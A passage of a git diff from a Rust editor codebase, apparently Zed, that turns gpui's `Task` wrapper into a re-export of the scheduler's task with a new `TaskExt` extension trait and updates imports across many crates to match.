6e537ae0c6e1db..5f07f2a70d2837 100644 --- a/crates/debugger_ui/src/attach_modal.rs +++ b/crates/debugger_ui/src/attach_modal.rs @@ -1,7 +1,7 @@ use dap::{DapRegistry, DebugRequest}; use futures::channel::oneshot; use fuzzy::{StringMatch, StringMatchCandidate}; -use gpui::{AppContext, DismissEvent, Entity, EventEmitter, Focusable, Render, Task}; +use gpui::{AppContext, DismissEvent, Entity, EventEmitter, Focusable, Render, Task, TaskExt}; use gpui::{Subscription, WeakEntity}; use picker::{Picker, PickerDelegate}; use project::Project; diff --git a/crates/debugger_ui/src/debugger_panel.rs b/crates/debugger_ui/src/debugger_panel.rs index f92b87a773c82d..36327d7695c131 100644 --- a/crates/debugger_ui/src/debugger_panel.rs +++ b/crates/debugger_ui/src/debugger_panel.rs @@ -19,7 +19,7 @@ use feature_flags::{FeatureFlag, FeatureFlagAppExt as _, PresenceFlag, register_ use gpui::{ Action, Anchor, App, AsyncWindowContext, ClipboardItem, Context, DismissEvent, Entity, EntityId, EventEmitter, FocusHandle, Focusable, MouseButton, MouseDownEvent, Point, - Subscription, Task, WeakEntity, anchored, deferred, + Subscription, Task, TaskExt, WeakEntity, anchored, deferred, }; use itertools::Itertools as _; diff --git a/crates/debugger_ui/src/debugger_ui.rs b/crates/debugger_ui/src/debugger_ui.rs index f5947a4393b2ee..2fe87d1ef00540 100644 --- a/crates/debugger_ui/src/debugger_ui.rs +++ b/crates/debugger_ui/src/debugger_ui.rs @@ -2,7 +2,7 @@ use std::any::TypeId; use debugger_panel::DebugPanel; use editor::{Editor, MultiBufferOffsetUtf16}; -use gpui::{Action, App, DispatchPhase, EntityInputHandler, actions}; +use gpui::{Action, App, DispatchPhase, EntityInputHandler, TaskExt, actions}; use new_process_modal::{NewProcessModal, NewProcessMode}; use project::debugger::{self, breakpoint_store::SourceBreakpoint, session::ThreadStatus}; use schemars::JsonSchema; diff --git a/crates/debugger_ui/src/new_process_modal.rs b/crates/debugger_ui/src/new_process_modal.rs index f0d243995f6991..6c1fe4c45b4e29 100644 --- a/crates/debugger_ui/src/new_process_modal.rs +++ b/crates/debugger_ui/src/new_process_modal.rs @@ -16,7 +16,7 @@ use editor::Editor; use fuzzy::{StringMatch, StringMatchCandidate}; use gpui::{ Action, App, AppContext, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, - KeyContext, Render, Subscription, Task, WeakEntity, actions, + KeyContext, Render, Subscription, Task, TaskExt, WeakEntity, actions, }; use itertools::Itertools as _; use picker::{Picker, PickerDelegate, highlighted_match_with_paths::HighlightedMatch}; diff --git a/crates/debugger_ui/src/session/running.rs b/crates/debugger_ui/src/session/running.rs index c496aa193a92d9..a964eb389f610e 100644 --- a/crates/debugger_ui/src/session/running.rs +++ b/crates/debugger_ui/src/session/running.rs @@ -33,7 +33,7 @@ use dap::{ use futures::{SinkExt, channel::mpsc}; use gpui::{ Action as _, AnyView, AppContext, Axis, Entity, EntityId, EventEmitter, FocusHandle, Focusable, - NoAction, Pixels, Point, Subscription, Task, WeakEntity, + NoAction, Pixels, Point, Subscription, Task, TaskExt, WeakEntity, }; use language::Buffer; use loaded_source_list::LoadedSourceList; diff --git a/crates/debugger_ui/src/session/running/stack_frame_list.rs b/crates/debugger_ui/src/session/running/stack_frame_list.rs index 7175b8556a45f0..982fc0f8567bc1 100644 --- a/crates/debugger_ui/src/session/running/stack_frame_list.rs +++ b/crates/debugger_ui/src/session/running/stack_frame_list.rs @@ -8,7 +8,7 @@ use dap::adapters::DebugAdapterName; use db::kvp::KeyValueStore; use gpui::{ Action, AnyElement, Entity, EventEmitter, FocusHandle, Focusable, FontWeight, ListState, - Subscription, Task, WeakEntity, list, + Subscription, Task, TaskExt, WeakEntity, list, }; use util::{ debug_panic, diff --git a/crates/debugger_ui/src/session/running/variable_list.rs b/crates/debugger_ui/src/session/running/variable_list.rs index 991961f627cb0c..4f39ae49db9d16 100644 --- a/crates/debugger_ui/src/session/running/variable_list.rs +++ b/crates/debugger_ui/src/session/running/variable_list.rs @@ -8,8 +8,9 @@ use dap::{ use editor::Editor; use gpui::{ Action, AnyElement, ClickEvent, ClipboardItem, Context, DismissEvent, Empty, Entity, - FocusHandle, Focusable, Hsla, MouseDownEvent, Point, Subscription, TextStyleRefinement, - UniformListScrollHandle, WeakEntity, actions, anchored, deferred, uniform_list, + FocusHandle, Focusable, Hsla, MouseDownEvent, Point, Subscription, TaskExt, + TextStyleRefinement, UniformListScrollHandle, WeakEntity, actions, anchored, deferred, + uniform_list, }; use itertools::Itertools; use menu::{SelectFirst, SelectLast, SelectNext, SelectPrevious}; diff --git a/crates/diagnostics/src/buffer_diagnostics.rs b/crates/diagnostics/src/buffer_diagnostics.rs index e703e193c312e9..b05e6a0f438918 100644 --- a/crates/diagnostics/src/buffer_diagnostics.rs +++ b/crates/diagnostics/src/buffer_diagnostics.rs @@ -13,7 +13,7 @@ use editor::{ use gpui::{ AnyElement, App, AppContext, Context, Entity, EntityId, EventEmitter, FocusHandle, Focusable, InteractiveElement, IntoElement, ParentElement, Render, SharedString, Styled, Subscription, - Task, WeakEntity, Window, actions, div, + Task, TaskExt, WeakEntity, Window, actions, div, }; use language::{Buffer, Capability, DiagnosticEntry, DiagnosticEntryRef, Point}; use project::{ diff --git a/crates/edit_prediction/src/edit_prediction.rs b/crates/edit_prediction/src/edit_prediction.rs index 6c98e296ef4256..e61cafa6adced1 100644 --- a/crates/edit_prediction/src/edit_prediction.rs +++ b/crates/edit_prediction/src/edit_prediction.rs @@ -24,6 +24,7 @@ use futures::{ select_biased, }; use gpui::BackgroundExecutor; +use gpui::TaskExt; use gpui::http_client::Url; use gpui::{ App, AsyncApp, Entity, EntityId, Global, SharedString, Task, WeakEntity, actions, diff --git a/crates/edit_prediction/src/mercury.rs b/crates/edit_prediction/src/mercury.rs index 8e9dfa6cee34d2..492071f7c7b4bf 100644 --- a/crates/edit_prediction/src/mercury.rs +++ b/crates/edit_prediction/src/mercury.rs @@ -8,7 +8,7 @@ use cloud_llm_client::EditPredictionRejectReason; use credentials_provider::CredentialsProvider; use futures::AsyncReadExt as _; use gpui::{ - App, AppContext as _, Context, Entity, Global, SharedString, Task, + App, AppContext as _, Context, Entity, Global, SharedString, Task, TaskExt, http_client::{self, AsyncBody, HttpClient, Method, StatusCode}, }; use language::{ToOffset, ToPoint as _}; diff --git a/crates/edit_prediction/src/ollama.rs b/crates/edit_prediction/src/ollama.rs index 0ae90dd9f6eca4..fc0f36d8321771 100644 --- a/crates/edit_prediction/src/ollama.rs +++ b/crates/edit_prediction/src/ollama.rs @@ -1,7 +1,7 @@ use anyhow::{Context as _, Result}; use futures::AsyncReadExt as _; use gpui::{ - App, SharedString, + App, SharedString, TaskExt, http_client::{self, HttpClient}, }; use language::language_settings::OpenAiCompatibleEditPredictionSettings; diff --git a/crates/edit_prediction/src/zeta.rs b/crates/edit_prediction/src/zeta.rs index c2e622ea010fea..7f9f12884709d4 100644 --- a/crates/edit_prediction/src/zeta.rs +++ b/crates/edit_prediction/src/zeta.rs @@ -10,7 +10,7 @@ use cloud_llm_client::{ AcceptEditPredictionBody, EditPredictionRejectReason, predict_edits_v3::RawCompletionRequest, }; use edit_prediction_types::PredictedCursorPosition; -use gpui::{App, AppContext as _, Entity, Task, WeakEntity, prelude::*}; +use gpui::{App, AppContext as _, Entity, Task, TaskExt, WeakEntity, prelude::*}; use language::{ Buffer, BufferSnapshot, DiagnosticSeverity, OffsetRangeExt as _, ToOffset as _, language_settings::all_language_settings, text_diff, diff --git a/crates/edit_prediction_context/src/edit_prediction_context.rs b/crates/edit_prediction_context/src/edit_prediction_context.rs index bbd12dec4e3b0f..a5dd0c157830b1 100644 --- a/crates/edit_prediction_context/src/edit_prediction_context.rs +++ b/crates/edit_prediction_context/src/edit_prediction_context.rs @@ -2,7 +2,9 @@ use crate::assemble_excerpts::assemble_excerpt_ranges; use anyhow::Result; use collections::HashMap; use futures::{FutureExt, StreamExt as _, channel::mpsc, future}; -use gpui::{App, AppContext, AsyncApp, Context, Entity, EntityId, EventEmitter, Task, WeakEntity}; +use gpui::{ + App, AppContext, AsyncApp, Context, Entity, EntityId, EventEmitter, Task, TaskExt, WeakEntity, +}; use language::{Anchor, Buffer, BufferSnapshot, OffsetRangeExt as _, Point, ToOffset as _}; use project::{LocationLink, Project, ProjectPath}; use smallvec::SmallVec; diff --git a/crates/edit_prediction_ui/src/edit_prediction_button.rs b/crates/edit_prediction_ui/src/edit_prediction_button.rs index d8e52fe8a7bb40..9f2b7a5f1fcf07 100644 --- a/crates/edit_prediction_ui/src/edit_prediction_button.rs +++ b/crates/edit_prediction_ui/src/edit_prediction_button.rs @@ -12,7 +12,7 @@ use feature_flags::FeatureFlagAppExt; use fs::Fs; use gpui::{ Action, Anchor, Animation, AnimationExt, App, AsyncWindowContext, Entity, FocusHandle, - Focusable, IntoElement, ParentElement, Render, Subscription, WeakEntity, actions, div, + Focusable, IntoElement, ParentElement, Render, Subscription, TaskExt, WeakEntity, actions, div, ease_in_out, pulsating_between, }; use indoc::indoc; diff --git a/crates/edit_prediction_ui/src/edit_prediction_ui.rs b/crates/edit_prediction_ui/src/edit_prediction_ui.rs index 2f6280619adafd..05f1224f50676f 100644 --- a/crates/edit_prediction_ui/src/edit_prediction_ui.rs +++ b/crates/edit_prediction_ui/src/edit_prediction_ui.rs @@ -7,6 +7,7 @@ use edit_prediction::{EditPredictionStore, ResetOnboarding, capture_example}; use edit_prediction_context_view::EditPredictionContextView; use editor::Editor; use feature_flags::FeatureFlagAppExt as _; +use gpui::TaskExt; use gpui::actions; use language::language_settings::AllLanguageSettings; use project::DisableAiSettings; diff --git a/crates/editor/src/clangd_ext.rs b/crates/editor/src/clangd_ext.rs index c52089ca6ac249..fbe58b06abb7ed 100644 --- a/crates/editor/src/clangd_ext.rs +++ b/crates/editor/src/clangd_ext.rs @@ -1,5 +1,5 @@ use anyhow::Context as _; -use gpui::{App, Context, Entity, Window}; +use gpui::{App, Context, Entity, TaskExt, Window}; use language::Language; use project::lsp_store::lsp_ext_command::SwitchSourceHeaderResult; use rpc::proto; diff --git a/crates/editor/src/code_context_menus.rs b/crates/editor/src/code_context_menus.rs index 2c609e5ba81a00..904ebb1f810625 100644 --- a/crates/editor/src/code_context_menus.rs +++ b/crates/editor/src/code_context_menus.rs @@ -2,8 +2,8 @@ use crate::scroll::ScrollAmount; use fuzzy::{StringMatch, StringMatchCandidate}; use gpui::{ AnyElement, Entity, Focusable, FontWeight, ListSizingBehavior, ScrollHandle, ScrollStrategy, - SharedString, Size, StrikethroughStyle, StyledText, Task, UniformListScrollHandle, div, px, - uniform_list, + SharedString, Size, StrikethroughStyle, StyledText, Task, TaskExt, UniformListScrollHandle, + div, px, uniform_list, }; use itertools::Itertools; use language::CodeLabel; diff --git a/crates/editor/src/code_lens.rs b/crates/editor/src/code_lens.rs index c123eceea3d125..c78620e25fda43 100644 --- a/crates/editor/src/code_lens.rs +++ b/crates/editor/src/code_lens.rs @@ -2,7 +2,7 @@ use std::sync::Arc; use collections::{HashMap, HashSet}; use futures::future::join_all; -use gpui::{MouseButton, SharedString, Task, WeakEntity}; +use gpui::{MouseButton, SharedString, Task, TaskExt, WeakEntity}; use itertools::Itertools; use language::{BufferId, ClientCommand}; use multi_buffer::{Anchor, MultiBufferRow, MultiBufferSnapshot, ToPoint as _}; diff --git a/crates/editor/src/editor_tests.rs b/crates/editor/src/editor_tests.rs index 304f44d3c38b1b..9649b638a3b93b 100644 --- a/crates/editor/src/editor_tests.rs +++ b/crates/editor/src/editor_tests.rs @@ -18,8 +18,8 @@ use buffer_diff::{BufferDiff, DiffHunkSecondaryStatus, DiffHunkStatus, DiffHunkS use collections::HashMap; use futures::{StreamExt, channel::oneshot}; use gpui::{ - BackgroundExecutor, DismissEvent, Task, TestAppContext, UpdateGlobal, VisualTestContext, - WindowBounds, WindowOptions, div, + BackgroundExecutor, DismissEvent, Task, TaskExt, TestAppContext, UpdateGlobal, + VisualTestContext, WindowBounds, WindowOptions, div, }; use indoc::indoc; use language::{ diff --git a/crates/editor/src/element.rs b/crates/editor/src/element.rs index 7e751535910420..22eaeca92e44fe 100644 --- a/crates/editor/src/element.rs +++ b/crates/editor/src/element.rs @@ -46,9 +46,9 @@ use gpui::{ Modifiers, ModifiersChangedEvent, MouseButton, MouseClickEvent, MouseDownEvent, MouseMoveEvent, MousePressureEvent, MouseUpEvent, PaintQuad, ParentElement, Pixels, PressureStage, ScrollDelta, ScrollHandle, ScrollWheelEvent, ShapedLine, SharedString, Size, StatefulInteractiveElement, - Style, Styled, StyledText, TextAlign, TextRun, TextStyleRefinement, WeakEntity, Window, - anchored, deferred, div, fill, linear_color_stop, linear_gradient, outline, pattern_slash, - point, px, quad, relative, size, solid_background, transparent_black, + Style, Styled, StyledText, TaskExt, TextAlign, TextRun, TextStyleRefinement, WeakEntity, + Window, anchored, deferred, div, fill, linear_color_stop, linear_gradient, outline, + pattern_slash, point, px, quad, relative, size, solid_background, transparent_black, }; use itertools::Itertools; use language::{ diff --git a/crates/editor/src/hover_popover.rs b/crates/editor/src/hover_popover.rs index cfa7284127e968..6474170aacea3b 100644 --- a/crates/editor/src/hover_popover.rs +++ b/crates/editor/src/hover_popover.rs @@ -11,8 +11,8 @@ use anyhow::Context as _; use gpui::{ AnyElement, App, AsyncWindowContext, Bounds, Context, Entity, Focusable as _, FontWeight, Hsla, InteractiveElement, IntoElement, MouseButton, ParentElement, Pixels, ScrollHandle, Size, - StatefulInteractiveElement, StyleRefinement, Styled, Subscription, Task, TextStyleRefinement, - Window, canvas, div, px, + StatefulInteractiveElement, StyleRefinement, Styled, Subscription, Task, TaskExt, + TextStyleRefinement, Window, canvas, div, px, }; use itertools::Itertools; use language::{DiagnosticEntry, Language, LanguageRegistry}; diff --git a/crates/editor/src/rust_analyzer_ext.rs b/crates/editor/src/rust_analyzer_ext.rs index 6d4d5999617617..ab59586c3a86a3 100644 --- a/crates/editor/src/rust_analyzer_ext.rs +++ b/crates/editor/src/rust_analyzer_ext.rs @@ -1,7 +1,7 @@ use std::{fs, path::Path}; use anyhow::Context as _; -use gpui::{App, AppContext as _, Context, Entity, Window}; +use gpui::{App, AppContext as _, Context, Entity, TaskExt, Window}; use language::{Capability, Language, proto::serialize_anchor}; use multi_buffer::MultiBuffer; use project::{ diff --git a/crates/extension_host/src/extension_host.rs b/crates/extension_host/src/extension_host.rs index ca43b4a3993f6e..4ebee680621182 100644 --- a/crates/extension_host/src/extension_host.rs +++ b/crates/extension_host/src/extension_host.rs @@ -31,8 +31,8 @@ use futures::{ select_biased, }; use gpui::{ - App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, Global, Task, UpdateGlobal as _, - WeakEntity, actions, + App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, Global, Task, TaskExt, + UpdateGlobal as _, WeakEntity, actions, }; use http_client::{AsyncBody, HttpClient, HttpClientWithUrl}; use language::{ diff --git a/crates/extension_host/src/extension_store_test.rs b/crates/extension_host/src/extension_store_test.rs index abdb3ffd3fad2b..2e2408ea2d901b 100644 --- a/crates/extension_host/src/extension_store_test.rs +++ b/crates/extension_host/src/extension_store_test.rs @@ -8,7 +8,7 @@ use collections::{BTreeMap, HashSet}; use extension::ExtensionHostProxy; use fs::{FakeFs, Fs, RealFs}; use futures::{AsyncReadExt, FutureExt, StreamExt, io::BufReader}; -use gpui::{AppContext as _, BackgroundExecutor, TestAppContext}; +use gpui::{AppContext as _, BackgroundExecutor, TaskExt, TestAppContext}; use http_client::{FakeHttpClient, Response}; use language::{BinaryStatus, LanguageMatcher, LanguageName, LanguageRegistry}; use language_extension::LspAccess; diff --git a/crates/extensions_ui/src/extensions_ui.rs b/crates/extensions_ui/src/extensions_ui.rs index 0e6bfe8498dc5b..af3b9031e44eee 100644 --- a/crates/extensions_ui/src/extensions_ui.rs +++ b/crates/extensions_ui/src/extensions_ui.rs @@ -15,7 +15,7 @@ use extension_host::{ExtensionManifest, ExtensionOperation, ExtensionStore}; use fuzzy::{StringMatchCandidate, match_strings}; use gpui::{ Action, Anchor, App, ClipboardItem, Context, Entity, EventEmitter, Focusable, - InteractiveElement, KeyContext, ParentElement, Point, Render, Styled, Task, TextStyle, + InteractiveElement, KeyContext, ParentElement, Point, Render, Styled, Task, TaskExt, TextStyle, UniformListScrollHandle, WeakEntity, Window, actions, point, uniform_list, }; use num_format::{Locale, ToFormattedString}; diff --git a/crates/file_finder/src/file_finder.rs b/crates/file_finder/src/file_finder.rs index 66acefde69f122..c15524b17bfe50 100644 --- a/crates/file_finder/src/file_finder.rs +++ b/crates/file_finder/src/file_finder.rs @@ -14,7 +14,7 @@ use fuzzy_nucleo::{PathMatch, PathMatchCandidate}; use gpui::{ Action, AnyElement, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, KeyContext, Modifiers, ModifiersChangedEvent, ParentElement, Render, - StatefulInteractiveElement, Styled, Task, WeakEntity, Window, actions, rems, + StatefulInteractiveElement, Styled, Task, TaskExt, WeakEntity, Window, actions, rems, }; use open_path_prompt::{ OpenPathPrompt, diff --git a/crates/git_ui/src/branch_picker.rs b/crates/git_ui/src/branch_picker.rs index 69829231619175..64f1032ce59164 100644 --- a/crates/git_ui/src/branch_picker.rs +++ b/crates/git_ui/src/branch_picker.rs @@ -8,7 +8,7 @@ use gpui::http_client::Url; use gpui::{ Action, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, InteractiveElement, IntoElement, Modifiers, ModifiersChangedEvent, ParentElement, Render, - SharedString, Styled, Subscription, Task, WeakEntity, Window, actions, rems, + SharedString, Styled, Subscription, Task, TaskExt, WeakEntity, Window, actions, rems, }; use picker::{Picker, PickerDelegate, PickerEditorPosition}; use project::git_store::{Repository, RepositoryEvent}; diff --git a/crates/git_ui/src/git_panel.rs b/crates/git_ui/src/git_panel.rs index 820c880a1bd19a..a9e558b15664f5 100644 --- a/crates/git_ui/src/git_panel.rs +++ b/crates/git_ui/src/git_panel.rs @@ -39,8 +39,8 @@ use git::{ use gpui::{ AbsoluteLength, Action, Anchor, AsyncApp, AsyncWindowContext, Bounds, ClickEvent, DismissEvent, Empty, Entity, EventEmitter, FocusHandle, Focusable, KeyContext, MouseButton, MouseDownEvent, - Point, PromptLevel, ScrollStrategy, Subscription, Task, TextStyle, UniformListScrollHandle, - WeakEntity, actions, anchored, deferred, point, size, uniform_list, + Point, PromptLevel, ScrollStrategy, Subscription, Task, TaskExt, TextStyle, + UniformListScrollHandle, WeakEntity, actions, anchored, deferred, point, size, uniform_list, }; use itertools::Itertools; use language::{Buffer, File}; diff --git a/crates/git_ui/src/git_ui.rs b/crates/git_ui/src/git_ui.rs index f4c2a441d45e9c..4fda322cc89a23 100644 --- a/crates/git_ui/src/git_ui.rs +++ b/crates/git_ui/src/git_ui.rs @@ -17,7 +17,7 @@ use git::{ }; use gpui::{ App, ClipboardItem, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, - SharedString, Subscription, Task, Window, + SharedString, Subscription, Task, TaskExt, Window, }; use menu::{Cancel, Confirm}; use project::git_store::Repository; diff --git a/crates/git_ui/src/stash_picker.rs b/crates/git_ui/src/stash_picker.rs index 6e6833f3cb4833..190fca9fa515d4 100644 --- a/crates/git_ui/src/stash_picker.rs +++ b/crates/git_ui/src/stash_picker.rs @@ -4,7 +4,7 @@ use git::stash::StashEntry; use gpui::{ Action, AnyElement, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, InteractiveElement, IntoElement, Modifiers, ModifiersChangedEvent, ParentElement, Render, - SharedString, Styled, Subscription, Task, WeakEntity, Window, actions, rems, + SharedString, Styled, Subscription, Task, TaskExt, WeakEntity, Window, actions, rems, }; use picker::{Picker, PickerDelegate}; use project::git_store::{Repository, RepositoryEvent}; diff --git a/crates/git_ui/src/worktree_picker.rs b/crates/git_ui/src/worktree_picker.rs index 49a42438f45d7e..8b22dfdd614415 100644 --- a/crates/git_ui/src/worktree_picker.rs +++ b/crates/git_ui/src/worktree_picker.rs @@ -7,8 +7,8 @@ use fuzzy::StringMatchCandidate; use git::repository::Worktree as GitWorktree; use gpui::{ Action, AnyElement, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, - IntoElement, ParentElement, Render, SharedString, Styled, Subscription, Task, WeakEntity, - Window, actions, rems, + IntoElement, ParentElement, Render, SharedString, Styled, Subscription, Task, TaskExt, + WeakEntity, Window, actions, rems, }; use picker::{Picker, PickerDelegate, PickerEditorPosition}; use project::Project; diff --git a/crates/git_ui/src/worktree_service.rs b/crates/git_ui/src/worktree_service.rs index ba411cb06422fe..0ec34f3d915a74 100644 --- a/crates/git_ui/src/worktree_service.rs +++ b/crates/git_ui/src/worktree_service.rs @@ -4,7 +4,7 @@ use std::sync::Arc; use anyhow::anyhow; use collections::HashSet; use fs::Fs; -use gpui::{AsyncWindowContext, Entity, SharedString, WeakEntity}; +use gpui::{AsyncWindowContext, Entity, SharedString, TaskExt, WeakEntity}; use project::Project; use project::git_store::Repository; use project::project_settings::ProjectSettings; diff --git a/crates/gpui/src/executor.rs b/crates/gpui/src/executor.rs index ab253472ad8699..07f1667b6201e4 100644 --- a/crates/gpui/src/executor.rs +++ b/crates/gpui/src/executor.rs @@ -4,12 +4,11 @@ use futures::prelude::*; use gpui_util::{TryFutureExt, TryFutureExtBacktrace}; use scheduler::Instant; use scheduler::Scheduler; -use std::{ - fmt::Debug, future::Future, marker::PhantomData, mem, pin::Pin, rc::Rc, sync::Arc, - time::Duration, -}; +use std::{future::Future, marker::PhantomData, mem, pin::Pin, rc::Rc, sync::Arc, time::Duration}; -pub use scheduler::{FallibleTask, ForegroundExecutor as SchedulerForegroundExecutor, Priority}; +pub use scheduler::{ + FallibleTask, ForegroundExecutor as SchedulerForegroundExecutor, Priority, Task, +}; /// A pointer to the executor that is currently running, /// for spawning background tasks. @@ -28,83 +27,32 @@ pub struct ForegroundExecutor { not_send: PhantomData>, } -/// Task is a primitive that allows work to happen in the background. +/// Extension trait for `Task>` that adds `detach_and_log_err` with an `&App` context. /// -/// It implements [`Future`] so you can `.await` on it. -/// -/// If you drop a task it will be cancelled immediately. Calling [`Task::detach`] allows -/// the task to continue running, but with no way to return a value. -#[must_use] -#[derive(Debug)] -pub struct Task(scheduler::Task); - -impl Task { - /// Creates a new task that will resolve with the value. - pub fn ready(val: T) -> Self { - Task(scheduler::Task::ready(val)) - } - - /// Returns true if the task has completed or was created with `Task::ready`. - pub fn is_ready(&self) -> bool { - self.0.is_ready() - } - - /// Detaching a task runs it to completion in the background. - pub fn detach(self) { - self.0.detach() - } - - /// Wraps a scheduler::Task. - pub fn from_scheduler(task: scheduler::Task) -> Self { - Task(task) - } - - /// Converts this task into a fallible task that returns `Option`. - /// - /// Unlike the standard `Task`, a [`FallibleTask`] will return `None` - /// if the task was cancelled. - /// - /// # Example - /// - /// ```ignore - /// // Background task that gracefully handles cancellation: - /// cx.background_spawn(async move { - /// let result = foreground_task.fallible().await; - /// if let Some(value) = result { - /// // Process the value - /// } - /// // If None, task was cancelled - just exit gracefully - /// }).detach(); - /// ``` - pub fn fallible(self) -> FallibleTask { - self.0.fallible() - } +/// This trait is automatically implemented for all `Task>` types. +pub trait TaskExt { + /// Run the task to completion in the background and log any errors that occur. + fn detach_and_log_err(self, cx: &App); + /// Like [`Self::detach_and_log_err`], but uses `{:?}` formatting on failure so `anyhow::Error` + /// values emit their full backtrace. Prefer `detach_and_log_err` unless a backtrace is wanted. + fn detach_and_log_err_with_backtrace(self, cx: &App); } -impl Task> +impl TaskExt for Task> where T: 'static, - E: 'static + std::fmt::Display, + E: 'static + std::fmt::Display + std::fmt::Debug, { - /// Run the task to completion in the background and log any errors that occur. #[track_caller] - pub fn detach_and_log_err(self, cx: &App) { + fn detach_and_log_err(self, cx: &App) { let location = core::panic::Location::caller(); cx.foreground_executor() .spawn(self.log_tracked_err(*location)) .detach(); } -} -impl Task> -where - T: 'static, - E: 'static + std::fmt::Debug, -{ - /// Like [`Self::detach_and_log_err`], but uses `{:?}` formatting on failure so `anyhow::Error` - /// values emit their full backtrace. Prefer `detach_and_log_err` unless a backtrace is wanted. #[track_caller] - pub fn detach_and_log_err_with_backtrace(self, cx: &App) { + fn detach_and_log_err_with_backtrace(self, cx: &App) { let location = *core::panic::Location::caller(); cx.foreground_executor() .spawn(self.log_tracked_err_with_backtrace(location)) @@ -112,20 +60,6 @@ where } } -impl std::future::Future for Task { - type Output = T; - - fn poll( - self: std::pin::Pin<&mut Self>, - cx: &mut std::task::Context<'_>, - ) -> std::task::Poll { - // SAFETY: Task is a repr(transparent) wrapper around scheduler::Task, - // and we're just projecting the pin through to the inner task. - let inner = unsafe { self.map_unchecked_mut(|t| &mut t.0) }; - inner.poll(cx) - } -} - impl BackgroundExecutor { /// Creates a new BackgroundExecutor from the given PlatformDispatcher. pub fn new(dispatcher: Arc) -> Self { @@ -175,9 +109,9 @@ impl BackgroundExecutor { R: Send + 'static, { if priority == Priority::RealtimeAudio { - Task::from_scheduler(self.inner.spawn_realtime(future)) + self.inner.spawn_realtime(future) } else { - Task::from_scheduler(self.inner.spawn_with_priority(priority, future)) + self.inner.spawn_with_priority(priority, future) } } @@ -426,7 +360,7 @@ impl ForegroundExecutor { where R: 'static, { - Task::from_scheduler(self.inner.spawn(future.boxed_local())) + self.inner.spawn(future.boxed_local()) } /// Enqueues the given Task to run on the main thread with the given priority. @@ -440,7 +374,7 @@ impl ForegroundExecutor { R: 'static, { // Priority is ignored for foreground tasks - they run in order on the main thread - Task::from_scheduler(self.inner.spawn(future)) + self.inner.spawn(future) } /// Used by the test harness to run an async test in a synchronous fashion. diff --git a/crates/gpui/src/prelude.rs b/crates/gpui/src/prelude.rs index 191d0a0e6d4019..b5185a25e86198 100644 --- a/crates/gpui/src/prelude.rs +++ b/crates/gpui/src/prelude.rs @@ -5,5 +5,5 @@ pub use crate::{ AppContext as _, BorrowAppContext, Context, Element, InteractiveElement, IntoElement, ParentElement, Refineable, Render, RenderOnce, StatefulInteractiveElement, Styled, StyledImage, - VisualContext, util::FluentBuilder, + TaskExt as _, VisualContext, util::FluentBuilder, }; diff --git a/crates/inspector_ui/src/inspector.rs b/crates/inspector_ui/src/inspector.rs index b687ea70a57d0f..36eed3bc72c60c 100644 --- a/crates/inspector_ui/src/inspector.rs +++ b/crates/inspector_ui/src/inspector.rs @@ -1,5 +1,5 @@ use anyhow::{Context as _, anyhow}; -use gpui::{App, DivInspectorState, Inspector, InspectorElementId, IntoElement, Window}; +use gpui::{App, DivInspectorState, Inspector, InspectorElementId, IntoElement, TaskExt, Window}; use std::{cell::OnceCell, path::Path, sync::Arc}; use ui::{Label, Tooltip, prelude::*, utils::platform_title_bar_height}; use util::{ResultExt as _, command::new_command}; diff --git a/crates/journal/src/journal.rs b/crates/journal/src/journal.rs index b8028c79b3d5da..713317b70dbef9 100644 --- a/crates/journal/src/journal.rs +++ b/crates/journal/src/journal.rs @@ -1,7 +1,7 @@ use chrono::{Datelike, Local, NaiveTime, Timelike}; use editor::scroll::Autoscroll; use editor::{Editor, SelectionEffects}; -use gpui::{App, AppContext as _, Context, Window, actions}; +use gpui::{App, AppContext as _, Context, TaskExt, Window, actions}; pub use settings::HourFormat; use settings::{RegisterSetting, Settings}; use std::{ diff --git a/crates/language_models/src/provider/anthropic.rs b/crates/language_models/src/provider/anthropic.rs index af5e53300a785b..7f19b81d6dc3bb 100644 --- a/crates/language_models/src/provider/anthropic.rs +++ b/crates/language_models/src/provider/anthropic.rs @@ -5,7 +5,7 @@ use anyhow::Result; use collections::BTreeMap; use credentials_provider::CredentialsProvider; use futures::{FutureExt, StreamExt, future::BoxFuture, stream::BoxStream}; -use gpui::{AnyView, App, AsyncApp, Context, Entity, Task}; +use gpui::{AnyView, App, AsyncApp, Context, Entity, Task, TaskExt}; use http_client::HttpClient; use language_model::{ ANTHROPIC_PROVIDER_ID, ANTHROPIC_PROVIDER_NAME, ApiKeyState, AuthenticateError, diff --git a/crates/language_models/src/provider/bedrock.rs b/crates/language_models/src/provider/bedrock.rs index fb48e7d73a20dc..97eb5456e5dbc4 100644 --- a/crates/language_models/src/provider/bedrock.rs +++ b/crates/language_models/src/provider/bedrock.rs @@ -25,7 +25,8 @@ use collections::{BTreeMap, HashMap}; use credentials_provider::CredentialsProvider; use futures::{FutureExt, Stream, StreamExt, future::BoxFuture, stream::BoxStream}; use gpui::{ - AnyView, App, AsyncApp, Context, Entity, FocusHandle, Subscription, Task, Window, actions, + AnyView, App, AsyncApp, Context, Entity, FocusHandle, Subscription, Task, TaskExt, Window, + actions, }; use gpui_tokio::Tokio; use http_client::HttpClient; diff --git a/crates/language_models/src/provider/cloud.rs b/crates/language_models/src/provider/cloud.rs index 0dae88fc3072e3..c37b0162d45a16 100644 --- a/crates/language_models/src/provider/cloud.rs +++ b/crates/language_models/src/provider/cloud.rs @@ -7,7 +7,7 @@ use cloud_api_types::Plan; use futures::FutureExt; use futures::StreamExt; use futures::future::BoxFuture; -use gpui::{AnyElement, AnyView, App, AppContext, Context, Entity, Subscription, Task}; +use gpui::{AnyElement, AnyView, App, AppContext, Context, Entity, Subscription, Task, TaskExt}; use language_model::{ AuthenticateError, IconOrSvg, LanguageModel, LanguageModelProvider, LanguageModelProviderId, LanguageModelProviderName, LanguageModelProviderState, ZED_CLOUD_PROVIDER_ID, diff --git a/crates/language_models/src/provider/deepseek.rs b/crates/language_models/src/provider/deepseek.rs index 9f10da20c124b5..757539a0895396 100644 --- a/crates/language_models/src/provider/deepseek.rs +++ b/crates/language_models/src/provider/deepseek.rs @@ -5,7 +5,7 @@ use deepseek::DEEPSEEK_API_URL; use futures::Stream; use 